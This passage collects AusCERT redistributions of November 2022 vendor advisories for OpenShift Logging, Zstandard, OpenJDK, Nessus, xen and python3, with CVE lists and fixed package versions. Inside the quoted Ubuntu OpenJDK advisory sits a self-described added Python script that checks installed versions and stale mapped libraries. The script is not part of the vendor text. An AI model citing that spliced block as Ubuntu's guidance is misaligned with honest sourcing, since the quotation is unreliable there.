Publisher: Red Hat
Operating System: Red Hat
Resolution: Patch/Upgrade
CVE Names: CVE-2022-40674 CVE-2022-39399 CVE-2022-37434
CVE-2022-32149 CVE-2022-29901 CVE-2022-29900
CVE-2022-23825 CVE-2022-23816 CVE-2022-21628
CVE-2022-21626 CVE-2022-21624 CVE-2022-21619
CVE-2022-21618 CVE-2022-3515 CVE-2022-2588
CVE-2022-2509 CVE-2022-1353 CVE-2022-0494
CVE-2020-35527 CVE-2020-35525
Original Bulletin:
https://access.redhat.com/errata/RHSA-2022:6882
Comment: CVSS (Max): 9.8 CVE-2022-40674 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: Red Hat
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: Openshift Logging 5.3.13 security and bug fix release
Advisory ID: RHSA-2022:6882-01
Product: Red Hat OpenShift Enterprise
Advisory URL: https://access.redhat.com/errata/RHSA-2022:6882
Issue date: 2022-11-09
CVE Names: CVE-2020-35525 CVE-2020-35527 CVE-2022-0494
CVE-2022-1353 CVE-2022-2509 CVE-2022-2588
CVE-2022-3515 CVE-2022-21618 CVE-2022-21619
CVE-2022-21624 CVE-2022-21626 CVE-2022-21628
CVE-2022-23816 CVE-2022-23825 CVE-2022-29900
CVE-2022-29901 CVE-2022-32149 CVE-2022-37434
CVE-2022-39399 CVE-2022-40674
=====================================================================
1. Summary:
An update is now available for OpenShift Logging 5.3.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Description:
Openshift Logging 5.3.13 security and bug fix release
Security Fix(es):
* golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time
to parse complex tags (CVE-2022-32149)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
3. Solution:
For OpenShift Container Platform 4.9 see the following documentation, which
will be updated shortly, for detailed release notes:
https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html
For Red Hat OpenShift Logging 5.3, see the following instructions to apply
this update:
https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html
4. Bugs fixed (https://bugzilla.redhat.com/):
2134010 - CVE-2022-32149 golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time to parse complex tags
5. References:
https://access.redhat.com/security/cve/CVE-2020-35525
https://access.redhat.com/security/cve/CVE-2020-35527
https://access.redhat.com/security/cve/CVE-2022-0494
https://access.redhat.com/security/cve/CVE-2022-1353
https://access.redhat.com/security/cve/CVE-2022-2509
https://access.redhat.com/security/cve/CVE-2022-2588
https://access.redhat.com/security/cve/CVE-2022-3515
https://access.redhat.com/security/cve/CVE-2022-21618
https://access.redhat.com/security/cve/CVE-2022-21619
https://access.redhat.com/security/cve/CVE-2022-21624
https://access.redhat.com/security/cve/CVE-2022-21626
https://access.redhat.com/security/cve/CVE-2022-21628
https://access.redhat.com/security/cve/CVE-2022-23816
https://access.redhat.com/security/cve/CVE-2022-23825
https://access.redhat.com/security/cve/CVE-2022-29900
https://access.redhat.com/security/cve/CVE-2022-29901
https://access.redhat.com/security/cve/CVE-2022-32149
https://access.redhat.com/security/cve/CVE-2022-37434
https://access.redhat.com/security/cve/CVE-2022-39399
https://access.redhat.com/security/cve/CVE-2022-40674
https://access.redhat.com/security/updates/classification/#moderate
6. Contact:
The Red Hat security contact is . More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
- -----END PGP SIGNATURE-----
- --------------------------END INCLUDED TEXT--------------------
ESB-2022.5784 - [Ubuntu] Zstandard: CVSS (Max): 5.5
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5784
USN-5720-1: Zstandard vulnerabilities
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Zstandard
Publisher: Ubuntu
Operating System: Ubuntu
Resolution: Patch/Upgrade
CVE Names: CVE-2021-24032 CVE-2021-24031
Original Bulletin:
https://ubuntu.com/security/notices/USN-5720-1
Comment: CVSS (Max): 5.5 CVE-2021-24031 (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
CVSS Source: NVD
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
- --------------------------BEGIN INCLUDED TEXT--------------------
USN-5720-1: Zstandard vulnerabilities
9 November 2022
Zstandard could be made to expose sensitive information
Releases
o Ubuntu 16.04 ESM
Packages
o libzstd - fast lossless compression algorithm
Details
It was discovered that Zstandard was not properly managing file
permissions when generating output files. A local attacker could
possibly use this issue to cause a race condition and gain
unauthorized access to sensitive data.
Update instructions
The problem can be corrected by updating your system to the following package
versions:
Ubuntu 16.04
o zstd - 1.3.1+dfsg-1~ubuntu0.16.04.1+esm3
Available with Ubuntu Pro (Infra-only)
o libzstd1 - 1.3.1+dfsg-1~ubuntu0.16.04.1+esm3
Available with Ubuntu Pro (Infra-only)
In general, a standard system update will make all the necessary changes.
References
o CVE-2021-24031
o CVE-2021-24032
Related notices
o USN-4760-1: libzstd-dev, libzstd, zstd, libzstd1-dev, libzstd1-udeb,
libzstd1
- --------------------------END INCLUDED TEXT--------------------
ESB-2022.5783 - [Ubuntu] OpenJDK: CVSS (Max): 5.3
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5783
USN-5719-1: OpenJDK vulnerabilities
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: OpenJDK
Publisher: Ubuntu
Operating System: Ubuntu
Resolution: Patch/Upgrade
CVE Names: CVE-2022-39399 CVE-2022-21628 CVE-2022-21626
CVE-2022-21624 CVE-2022-21619 CVE-2022-21618
Original Bulletin:
https://ubuntu.com/security/notices/USN-5719-1
Comment: CVSS (Max): 5.3 CVE-2022-21628 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)
CVSS Source: NVD
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
- --------------------------BEGIN INCLUDED TEXT--------------------
USN-5719-1: OpenJDK vulnerabilities
9 November 2022
Several security issues were fixed in OpenJDK.
Releases
o Ubuntu 22.10
o Ubuntu 22.04 LTS
o Ubuntu 20.04 LTS
o Ubuntu 18.04 LTS
o Ubuntu 16.04 ESM
Packages
o openjdk-17 - Open Source Java implementation
o openjdk-19 - Open Source Java implementation
o openjdk-8 - Open Source Java implementation
o openjdk-lts - Open Source Java implementation
Details
It was discovered that OpenJDK incorrectly handled long client hostnames.
An attacker could possibly use this issue to cause the corruption of
sensitive information. (CVE-2022-21619)
It was discovered that OpenJDK incorrectly randomized DNS port numbers. A
remote attacker could possibly use this issue to perform spoofing attacks.
(CVE-2022-21624)
It was discovered that OpenJDK did not limit the number of connections
accepted from HTTP clients. An attacker could possibly use this issue to
cause a denial of service. (CVE-2022-21628)
It was discovered that OpenJDK incorrectly handled X.509 certificates. An
attacker could possibly use this issue to cause a denial of service. This
issue only affected OpenJDK 8 and OpenJDK 11. (CVE-2022-21626)
It was discovered that OpenJDK incorrectly handled cached server
connections. An attacker could possibly use this issue to perform spoofing
attacks. This issue only affected OpenJDK 11, OpenJDK 17 and OpenJDK 19.
(CVE-2022-39399)
It was discovered that OpenJDK incorrectly handled byte conversions. An
attacker could possibly use this issue to obtain sensitive information.
This issue only affected OpenJDK 11, OpenJDK 17 and OpenJDK 19.
(CVE-2022-21618)
Update instructions
The problem can be corrected by updating your system to the following package
versions:
Ubuntu 22.10
o openjdk-8-jre-headless - 8u352-ga-1~22.10
o openjdk-11-jre-headless - 11.0.17+8-1ubuntu2
o openjdk-11-jdk - 11.0.17+8-1ubuntu2
o openjdk-17-jre-headless - 17.0.5+8-2ubuntu1
o openjdk-17-jre - 17.0.5+8-2ubuntu1
o openjdk-17-jdk - 17.0.5+8-2ubuntu1
o openjdk-17-jre-zero - 17.0.5+8-2ubuntu1
o openjdk-8-jre-zero - 8u352-ga-1~22.10
o openjdk-19-jre - 19.0.1+10-1
o openjdk-8-jdk - 8u352-ga-1~22.10
o openjdk-11-jre-zero - 11.0.17+8-1ubuntu2
o openjdk-19-jre-zero - 19.0.1+10-1
o openjdk-8-jre - 8u352-ga-1~22.10
o openjdk-19-jre-headless - 19.0.1+10-1
o openjdk-19-jdk - 19.0.1+10-1
o openjdk-11-jre - 11.0.17+8-1ubuntu2
Ubuntu 22.04
o openjdk-8-jre-headless - 8u352-ga-1~22.04
o openjdk-11-jre-headless - 11.0.17+8-1ubuntu2~22.04
o openjdk-11-jdk - 11.0.17+8-1ubuntu2~22.04
o openjdk-17-jre-headless - 17.0.5+8-2ubuntu1~22.04
o openjdk-17-jre - 17.0.5+8-2ubuntu1~22.04
o openjdk-17-jdk - 17.0.5+8-2ubuntu1~22.04
o openjdk-17-jre-zero - 17.0.5+8-2ubuntu1~22.04
o openjdk-8-jre-zero - 8u352-ga-1~22.04
o openjdk-19-jre - 19.0.1+10-1ubuntu1~22.04
o openjdk-8-jdk - 8u352-ga-1~22.04
o openjdk-11-jre-zero - 11.0.17+8-1ubuntu2~22.04
o openjdk-19-jre-zero - 19.0.1+10-1ubuntu1~22.04
o openjdk-8-jre - 8u352-ga-1~22.04
o openjdk-19-jre-headless - 19.0.1+10-1ubuntu1~22.04
o openjdk-19-jdk - 19.0.1+10-1ubuntu1~22.04
o openjdk-11-jre - 11.0.17+8-1ubuntu2~22.04
Ubuntu 20.04
o openjdk-8-jre-headless - 8u352-ga-1~20.04
o openjdk-8-jre - 8u352-ga-1~20.04
o openjdk-11-jdk - 11.0.17+8-1ubuntu2~20.04
o openjdk-17-jre-headless - 17.0.5+8-2ubuntu1~20.04
o openjdk-17-jre - 17.0.5+8-2ubuntu1~20.04
o openjdk-17-jdk - 17.0.5+8-2ubuntu1~20.04
o openjdk-17-jre-zero - 17.0.5+8-2ubuntu1~20.04
o openjdk-8-jre-zero - 8u352-ga-1~20.04
o openjdk-8-jdk - 8u352-ga-1~20.04
o openjdk-11-jre-zero - 11.0.17+8-1ubuntu2~20.04
o openjdk-11-jre-headless - 11.0.17+8-1ubuntu2~20.04
o openjdk-11-jre - 11.0.17+8-1ubuntu2~20.04
Ubuntu 18.04
o openjdk-8-jre-headless - 8u352-ga-1~18.04
o openjdk-8-jre - 8u352-ga-1~18.04
o openjdk-11-jdk - 11.0.17+8-1ubuntu2~18.04
o openjdk-17-jre-headless - 17.0.5+8-2ubuntu1~18.04
o openjdk-17-jre - 17.0.5+8-2ubuntu1~18.04
o openjdk-17-jdk - 17.0.5+8-2ubuntu1~18.04
o openjdk-17-jre-zero - 17.0.5+8-2ubuntu1~18.04
o openjdk-8-jre-zero - 8u352-ga-1~18.04
o openjdk-8-jdk - 8u352-ga-1~18.04
o openjdk-11-jre-zero - 11.0.17+8-1ubuntu2~18.04
o openjdk-11-jre-headless - 11.0.17+8-1ubuntu2~18.04
o openjdk-11-jre - 11.0.17+8-1ubuntu2~18.04
Ubuntu 16.04
o openjdk-8-jdk - 8u352-ga-1~16.04
Available with Ubuntu Pro (Infra-only)
o openjdk-8-jre-headless - 8u352-ga-1~16.04
Available with Ubuntu Pro (Infra-only)
o openjdk-8-jre - 8u352-ga-1~16.04
Available with Ubuntu Pro (Infra-only)
o openjdk-8-jre-zero - 8u352-ga-1~16.04
Available with Ubuntu Pro (Infra-only)
This update uses a new upstream release, which includes additional bug
fixes. After a standard system update you need to restart any Java
applications or applets to make all the necessary changes.
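The version table above is only useful if what dpkg reports can be compared against it, and dpkg's ordering rules (epoch, `~` sorting before the empty string, letters before other characters, numeric runs compared as numbers) are not plain string comparison. The Python below is an added example, not code from the Ubuntu advisory or from AusCERT: it reimplements the dpkg version ordering, reports which packages in a constructed `dpkg-query` listing are still below the Ubuntu 22.04 fixed versions quoted above, and, for the restart step, lists files a running process still has mapped although they were replaced on disk (the "(deleted)" marker in /proc/<pid>/maps). The sample dpkg and maps text, the package subset and all function names are assumptions made for the example.

```python
"""Check Ubuntu OpenJDK packages against the advisory's fixed versions.

Added example (not Ubuntu's or AusCERT's code): reimplements dpkg version
ordering, reports installed packages still below the fix, and lists replaced
libraries a running process still has mapped (why the restart step matters).
"""
import itertools
import re

# Fixed versions for Ubuntu 22.04, copied from the advisory (subset).
FIXED_VERSIONS_2204 = {
    "openjdk-8-jre-headless": "8u352-ga-1~22.04",
    "openjdk-11-jre-headless": "11.0.17+8-1ubuntu2~22.04",
    "openjdk-17-jre-headless": "17.0.5+8-2ubuntu1~22.04",
    "openjdk-19-jre-headless": "19.0.1+10-1ubuntu1~22.04",
}

# Constructed sample of: dpkg-query -W -f '${Package} ${Version} ${Status}\n' 'openjdk-*'
# The installed versions here are hypothetical.
SAMPLE_DPKG_QUERY = """\
openjdk-8-jre-headless 8u342-b07-0ubuntu1~22.04 install ok installed
openjdk-11-jre-headless 11.0.17+8-1ubuntu2~22.04 install ok installed
openjdk-17-jre-headless 17.0.4+8-1~22.04 install ok installed
openjdk-19-jre-headless 19.0.1+10-1ubuntu1~22.04 deinstall ok config-files
"""

# Constructed excerpt of /proc/<pid>/maps for a JVM started before the update.
SAMPLE_MAPS = """\
7f3a1c000000-7f3a1d2f0000 r-xp 00000000 fd:01 1311 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/libjvm.so (deleted)
7f3a1d400000-7f3a1d412000 r--p 00000000 fd:01 1400 /usr/lib/x86_64-linux-gnu/libz.so.1.2.11
"""


def _char_order(c):
    """dpkg ordering of non-digit characters: '~' < end of string < letters < others."""
    if c == "~":
        return -1
    if c.isalpha():
        return ord(c)
    return ord(c) + 256


def _cmp_fragment(a, b):
    """Compare one version fragment (upstream or revision) the dpkg way:
    alternate non-digit runs (ordered per _char_order) and numeric runs."""
    while a or b:
        ra, rb = re.match(r"[^0-9]*", a).group(), re.match(r"[^0-9]*", b).group()
        a, b = a[len(ra):], b[len(rb):]
        for ca, cb in itertools.zip_longest(ra, rb, fillvalue=""):
            oa = _char_order(ca) if ca else 0
            ob = _char_order(cb) if cb else 0
            if oa != ob:
                return -1 if oa < ob else 1
        da, db = re.match(r"[0-9]*", a).group(), re.match(r"[0-9]*", b).group()
        a, b = a[len(da):], b[len(db):]
        na, nb = int(da or "0"), int(db or "0")
        if na != nb:
            return -1 if na < nb else 1
    return 0


def _split_version(v):
    """'epoch:upstream-revision' -> (epoch, upstream, revision); epoch and revision optional."""
    epoch, sep, rest = v.partition(":")
    if not sep:
        epoch, rest = "0", v
    upstream, sep, revision = rest.rpartition("-")
    if not sep:
        upstream, revision = rest, ""
    return int(epoch), upstream, revision


def compare_versions(v1, v2):
    """-1, 0 or 1, ordering v1 against v2 like `dpkg --compare-versions`."""
    e1, u1, r1 = _split_version(v1)
    e2, u2, r2 = _split_version(v2)
    if e1 != e2:
        return -1 if e1 < e2 else 1
    return _cmp_fragment(u1, u2) or _cmp_fragment(r1, r2)


def parse_dpkg_query(text):
    """package -> version for entries whose dpkg status is 'installed'."""
    installed = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[4] == "installed":
            installed[parts[0]] = parts[1]
    return installed


def unpatched_packages(dpkg_output, fixed=FIXED_VERSIONS_2204):
    """{package: (installed, fixed)} for packages still below the fixed version."""
    return {pkg: (ver, fixed[pkg])
            for pkg, ver in parse_dpkg_query(dpkg_output).items()
            if pkg in fixed and compare_versions(ver, fixed[pkg]) < 0}


def stale_mappings(maps_text):
    """Mapped files a process still uses although they were replaced on disk."""
    tag = " (deleted)"
    return sorted({line.split(maxsplit=5)[5][:-len(tag)]
                   for line in maps_text.splitlines() if line.endswith(tag)})


if __name__ == "__main__":
    for pkg, (have, want) in unpatched_packages(SAMPLE_DPKG_QUERY).items():
        print(f"{pkg}: installed {have} < fixed {want}")
    for path in stale_mappings(SAMPLE_MAPS):
        print(f"still mapped after replacement, restart needed: {path}")
```

On a real host, feed the output of `dpkg-query -W -f '${Package} ${Version} ${Status}\n' 'openjdk-*'` to unpatched_packages and the contents of /proc/<pid>/maps for each Java process to stale_mappings; a process that still maps a "(deleted)" libjvm.so has not picked up the update, whatever dpkg says.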
References
o CVE-2022-21618
o CVE-2022-21626
o CVE-2022-39399
o CVE-2022-21628
o CVE-2022-21619
o CVE-2022-21624
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
ESB-2022.5782 - Nessus: CVSS (Max): 9.8
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5782
[R1] Nessus Version 8.15.7 Fixes Multiple Vulnerabilities
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Nessus
Publisher: Tenable
Operating System: Windows
UNIX variants (UNIX, Linux, OSX)
Resolution: Patch/Upgrade
CVE Names: CVE-2022-43680 CVE-2022-40674 CVE-2022-37434
CVE-2022-29824 CVE-2022-23308 CVE-2022-2309
Original Bulletin:
https://www.tenable.com/security/tns-2022-26
Comment: CVSS (Max): 9.8 CVE-2022-40674 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: Tenable
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
[R1] Nessus Version 8.15.7 Fixes Multiple Vulnerabilities
Critical
Synopsis
Nessus leverages third-party software to help provide underlying functionality.
Several of the third-party components (expat, libxml2, zlib) were found to
contain vulnerabilities, and updated versions have been made available by the
providers.
Out of caution and in line with good practice, Tenable has opted to upgrade
these components to address the potential impact of the issues. Nessus 8.15.7
updates expat to version 2.5.0, libxml2 to 2.10.3 and zlib to 1.2.13 to address
the identified vulnerabilities.
Solution
Tenable has released Nessus 8.15.7 to address these issues. The installation
files can be obtained from the Tenable Downloads Portal
(https://www.tenable.com/downloads/nessus).
This page contains information regarding security vulnerabilities that may
impact Tenable's products. This may include issues specific to our software, or
due to the use of third-party libraries within our software. Tenable strongly
encourages users to ensure that they upgrade or apply relevant patches in a
timely manner.
Tenable takes product security very seriously. If you believe you have found a
vulnerability in one of our products, we ask that you please work with us to
quickly resolve it in order to protect customers. Tenable believes in
responding quickly to such reports, maintaining communication with researchers,
and providing a solution in short order.
For more details on submitting vulnerability information, please see our
Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email
Risk Information
CVE ID: CVE-2022-2309
CVE-2022-29824
CVE-2022-23308
CVE-2022-40674
CVE-2022-43680
CVE-2022-37434
Tenable Advisory ID
TNS-2022-26
Risk Factor
Critical
CVSSv3 Base / Temporal Score
7.5 / 6.7 (CVE-2022-2309)
6.5 / 5.7 (CVE-2022-29824)
7.5 / 6.5 (CVE-2022-23308)
9.8 / 8.5 (CVE-2022-40674)
7.5 / 6.5 (CVE-2022-43680)
9.8 / 8.5 (CVE-2022-37434)
CVSSv3 Vector
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C (CVE-2022-2309)
AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C (CVE-2022-29824)
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C (CVE-2022-23308)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C (CVE-2022-40674)
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C (CVE-2022-43680)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C (CVE-2022-37434)
Affected Products
Nessus 8.15.1 to Nessus 8.15.6
Advisory Timeline
2022-11-09 - [R1] Initial Release
- --------------------------END INCLUDED TEXT--------------------
ESB-2022.5781 - [SUSE] xen: CVSS (Max): 7.5
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5781
Security update for xen
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: xen
Publisher: SUSE
Operating System: SUSE
Resolution: Patch/Upgrade
CVE Names: CVE-2022-42326 CVE-2022-42325 CVE-2022-42323
CVE-2022-42322 CVE-2022-42321 CVE-2022-42320
CVE-2022-42319 CVE-2022-42318 CVE-2022-42317
CVE-2022-42316 CVE-2022-42315 CVE-2022-42314
CVE-2022-42313 CVE-2022-42312 CVE-2022-42311
CVE-2022-42310 CVE-2022-42309 CVE-2022-33748
CVE-2022-33746 CVE-2021-28689
Original Bulletin:
https://www.suse.com/support/update/announcement/2022/suse-su-20223925-1
Comment: CVSS (Max): 7.5 CVE-2022-42320 (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)
CVSS Source: SUSE
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
SUSE Security Update: Security update for xen
______________________________________________________________________________
Announcement ID: SUSE-SU-2022:3925-1
Rating: important
References: #1185104 #1193923 #1203806 #1203807 #1204482 #1204485
#1204487 #1204488 #1204489 #1204490 #1204494 #1204496
Cross-References: CVE-2021-28689 CVE-2022-33746 CVE-2022-33748 CVE-2022-42309
CVE-2022-42310 CVE-2022-42311 CVE-2022-42312 CVE-2022-42313
CVE-2022-42314 CVE-2022-42315 CVE-2022-42316 CVE-2022-42317
CVE-2022-42318 CVE-2022-42319 CVE-2022-42320 CVE-2022-42321
CVE-2022-42322 CVE-2022-42323 CVE-2022-42325 CVE-2022-42326
Affected Products:
SUSE Linux Enterprise High Performance Computing 15-ESPOS
SUSE Linux Enterprise High Performance Computing 15-LTSS
SUSE Linux Enterprise Server for SAP 15
______________________________________________________________________________
An update that fixes 20 vulnerabilities is now available.
Description:
This update for xen fixes the following issues:
o CVE-2022-33746: Fixed DoS due to excessively long P2M pool freeing
(bsc#1203806).
o CVE-2022-33748: Fixed DoS due to race in locking (bsc#1203807).
o CVE-2021-28689: Fixed speculative vulnerabilities with bare (non-shim)
32-bit PV guests (bsc#1185104).
o CVE-2022-42311, CVE-2022-42312, CVE-2022-42313, CVE-2022-42314,
CVE-2022-42315, CVE-2022-42316, CVE-2022-42317, CVE-2022-42318: xen:
Xenstore: Guests can let xenstored run out of memory (bsc#1204482)
o CVE-2022-42309: xen: Xenstore: Guests can crash xenstored (bsc#1204485)
o CVE-2022-42310: xen: Xenstore: Guests can create orphaned Xenstore nodes
(bsc#1204487)
o CVE-2022-42319: xen: Xenstore: Guests can cause Xenstore to not free
temporary memory (bsc#1204488)
o CVE-2022-42320: xen: Xenstore: Guests can get access to Xenstore nodes of
deleted domains (bsc#1204489)
o CVE-2022-42321: xen: Xenstore: Guests can crash xenstored via exhausting
the stack (bsc#1204490)
o CVE-2022-42322, CVE-2022-42323: xen: Xenstore: cooperating guests can create
arbitrary numbers of nodes (bsc#1204494)
o CVE-2022-42325, CVE-2022-42326: xen: Xenstore: Guests can create arbitrary
number of nodes via transactions (bsc#1204496)
o xen: Frontends vulnerable to backends (bsc#1193923)
Special Instructions and Notes:
Please reboot the system after installing this update.
Patch Instructions:
To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:
o SUSE Linux Enterprise Server for SAP 15:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2022-3925=1
o SUSE Linux Enterprise High Performance Computing 15-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2022-3925=1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2022-3925=1
Package List:
o SUSE Linux Enterprise Server for SAP 15 (x86_64):
xen-4.10.4_40-150000.3.84.1
xen-debugsource-4.10.4_40-150000.3.84.1
xen-devel-4.10.4_40-150000.3.84.1
xen-libs-4.10.4_40-150000.3.84.1
xen-libs-debuginfo-4.10.4_40-150000.3.84.1
xen-tools-4.10.4_40-150000.3.84.1
xen-tools-debuginfo-4.10.4_40-150000.3.84.1
xen-tools-domU-4.10.4_40-150000.3.84.1
xen-tools-domU-debuginfo-4.10.4_40-150000.3.84.1
o SUSE Linux Enterprise High Performance Computing 15-LTSS (x86_64):
xen-4.10.4_40-150000.3.84.1
xen-debugsource-4.10.4_40-150000.3.84.1
xen-devel-4.10.4_40-150000.3.84.1
xen-libs-4.10.4_40-150000.3.84.1
xen-libs-debuginfo-4.10.4_40-150000.3.84.1
xen-tools-4.10.4_40-150000.3.84.1
xen-tools-debuginfo-4.10.4_40-150000.3.84.1
xen-tools-domU-4.10.4_40-150000.3.84.1
xen-tools-domU-debuginfo-4.10.4_40-150000.3.84.1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS (x86_64):
xen-4.10.4_40-150000.3.84.1
xen-debugsource-4.10.4_40-150000.3.84.1
xen-devel-4.10.4_40-150000.3.84.1
xen-libs-4.10.4_40-150000.3.84.1
xen-libs-debuginfo-4.10.4_40-150000.3.84.1
xen-tools-4.10.4_40-150000.3.84.1
xen-tools-debuginfo-4.10.4_40-150000.3.84.1
xen-tools-domU-4.10.4_40-150000.3.84.1
xen-tools-domU-debuginfo-4.10.4_40-150000.3.84.1
References:
o https://www.suse.com/security/cve/CVE-2021-28689.html
o https://www.suse.com/security/cve/CVE-2022-33746.html
o https://www.suse.com/security/cve/CVE-2022-33748.html
o https://www.suse.com/security/cve/CVE-2022-42309.html
o https://www.suse.com/security/cve/CVE-2022-42310.html
o https://www.suse.com/security/cve/CVE-2022-42311.html
o https://www.suse.com/security/cve/CVE-2022-42312.html
o https://www.suse.com/security/cve/CVE-2022-42313.html
o https://www.suse.com/security/cve/CVE-2022-42314.html
o https://www.suse.com/security/cve/CVE-2022-42315.html
o https://www.suse.com/security/cve/CVE-2022-42316.html
o https://www.suse.com/security/cve/CVE-2022-42317.html
o https://www.suse.com/security/cve/CVE-2022-42318.html
o https://www.suse.com/security/cve/CVE-2022-42319.html
o https://www.suse.com/security/cve/CVE-2022-42320.html
o https://www.suse.com/security/cve/CVE-2022-42321.html
o https://www.suse.com/security/cve/CVE-2022-42322.html
o https://www.suse.com/security/cve/CVE-2022-42323.html
o https://www.suse.com/security/cve/CVE-2022-42325.html
o https://www.suse.com/security/cve/CVE-2022-42326.html
o https://bugzilla.suse.com/1185104
o https://bugzilla.suse.com/1193923
o https://bugzilla.suse.com/1203806
o https://bugzilla.suse.com/1203807
o https://bugzilla.suse.com/1204482
o https://bugzilla.suse.com/1204485
o https://bugzilla.suse.com/1204487
o https://bugzilla.suse.com/1204488
o https://bugzilla.suse.com/1204489
o https://bugzilla.suse.com/1204490
o https://bugzilla.suse.com/1204494
o https://bugzilla.suse.com/1204496
- --------------------------END INCLUDED TEXT--------------------
ESB-2022.5780 - [SUSE] python3: CVSS (Max): 8.1
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5780
Security update for python3
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: python3
Publisher: SUSE
Operating System: SUSE
Resolution: Patch/Upgrade
CVE Names: CVE-2022-37454 CVE-2020-10735
Original Bulletin:
https://www.suse.com/support/update/announcement/2022/suse-su-20223924-1
Comment: CVSS (Max): 8.1 CVE-2022-37454 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: SUSE
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
SUSE Security Update: Security update for python3
______________________________________________________________________________
Announcement ID: SUSE-SU-2022:3924-1
Rating: important
References: #1203125 #1204577
Cross-References: CVE-2020-10735 CVE-2022-37454
Affected Products:
SUSE CaaS Platform 4.0
SUSE Enterprise Storage 6
SUSE Enterprise Storage 7
SUSE Linux Enterprise High Performance Computing 15-ESPOS
